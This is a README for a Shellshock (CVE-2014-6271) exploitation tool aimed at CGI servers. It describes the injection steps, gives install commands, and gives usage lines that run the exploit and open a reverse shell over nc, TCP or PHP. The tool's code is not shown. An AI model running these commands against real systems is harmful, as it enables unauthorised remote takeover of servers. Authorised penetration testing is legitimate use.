The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system.
- Exploit Automation: Automates the exploitation of the Shellshock vulnerability in CGI scripts, streamlining the process for penetration testing and security research.
- Reverse Shell Connectivity: Provides options for establishing a reverse shell connection to the target server, supporting various methods such as Netcat (nc), TCP, and PHP.
- Customizable Options: Allows users to specify the target host, CGI script, remote host for the reverse shell, port, and preferred shell method through command-line options.
- CVE Number: CVE-2014-6271
- CVE Description: Bash through 4.3 allows remote attackers to execute arbitrary commands via crafted environment variables passed to Bash scripts.
-
Identification of Vulnerable CGI Scripts:
- The tool scans the specified host for potential CGI scripts that may be susceptible to the Shellshock vulnerability.
-
Crafting Malicious Environment Variables:
- Once vulnerable CGI scripts are identified, the tool generates specially crafted environment variables containing malicious commands.
-
Exploiting Shellshock Vulnerability:
- The crafted environment variables are injected into the CGI scripts, taking advantage of the Shellshock vulnerability in the Bash shell.
-
Reverse Shell Connection:
- The tool establishes a reverse shell connection to the specified remote host and port, providing the user with interactive access to the target system.
-
User Interaction and Control:
- The user can interact with the target system through the established reverse shell connection, allowing for further exploitation or analysis.
Debian/Ubuntu
sudo apt-get install libcurl4-openssl-dev
Red Hat/Fedora
sudo dnf install libcurl-devel
macOS (Homebrew)
brew install curl-openssl
After installing the libcurl development package, attempt to install the CVE-2014-6271-Shellshock:
git clone https://github.com/MY7H404/CVE-2014-6271-Shellshock.git
cd CVE-2014-6271-Shellshock
pip3 install -r requirements.txt
python3 shellshock.py -a HOST -u /cgi/test -r REMOTE -p 1337 -s tcp
python3 shellshock.py [-h] -a HOST -u URI -r REMOTE -p PORT [-s {nc,tcp,php}]
-h, --help: Show help message and exit
-a HOST, --host HOST: Specify a remote host to test
-u URI, --uri URI: Specify a CGI script to test (e.g., /cgi/test)
-r REMOTE, --remote REMOTE: Specify the host for the reverse shell connection
-p PORT, --port PORT: Specify the port for the reverse shell connection
-s {nc,tcp,php}, --shell {nc,tcp,php}: Choose your preferred reverse shell method for seamless connectivity (default 'nc')
python3 shellshock.py -a 10.10.10.10 -u /cgi/test -r localhost -p 4444 -s tcp
This tool is created for educational and testing purposes only. The authors and contributors are not responsible for any illegal, unethical, or unauthorized use of this tool. Users are solely responsible for ensuring that their use of this tool complies with all applicable laws, regulations, and ethical standards.
Usage of this tool on systems or networks without explicit authorization is strictly prohibited. The authors and contributors disclaim any responsibility for any damage, loss of data, or other consequences resulting from the use of this tool.
By using this tool, you acknowledge that you have read, understood, and agree to abide by the terms of this disclaimer.
Use responsibly and ethically.
This project is licensed under the MIT License.